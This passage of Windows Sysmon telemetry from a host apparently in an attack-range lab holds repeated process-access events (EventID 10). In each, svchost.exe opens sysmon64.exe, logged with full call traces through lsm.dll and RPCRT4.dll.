05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1353,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1354,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1355,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1356,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1357,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1358,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1359,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1360,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 